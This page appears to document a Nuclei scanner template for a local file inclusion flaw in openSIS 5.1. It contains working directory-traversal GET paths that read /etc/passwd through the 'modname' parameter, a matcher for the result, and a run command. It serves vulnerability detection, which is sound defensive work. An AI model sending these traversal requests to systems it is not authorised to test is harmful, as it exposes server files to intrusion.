Skip to content

openSIS 5.1 - Local File Inclusion

ID: opensis-lfi

Severity: high

Author: pikpikcu

Tags: opensis,lfi,edb

openSIS 5.1 is vulnerable to local file inclusion and allows attackers to obtain potentially sensitive information by executing arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.

id: opensis-lfi
info:
name: openSIS 5.1 - Local File Inclusion
author: pikpikcu
severity: high
description: openSIS 5.1 is vulnerable to local file inclusion and allows attackers to obtain potentially sensitive information by executing arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
reference:
- https://www.exploit-db.com/exploits/38039
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query: http.title:"openSIS"
product: opensis
vendor: os4ed
tags: opensis,lfi,edb
http:
- method: GET
path:
- "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
- "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a004730450220417e63f24e8c4b5066881cda8e4eda3230095c6e5c61138cb2b3730b91764dce022100b5dea3bb4f7a239c553e42b92634c341866ebba8e450be97f2849bb358ba8518:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/opensis-lfi.yaml"

View on Github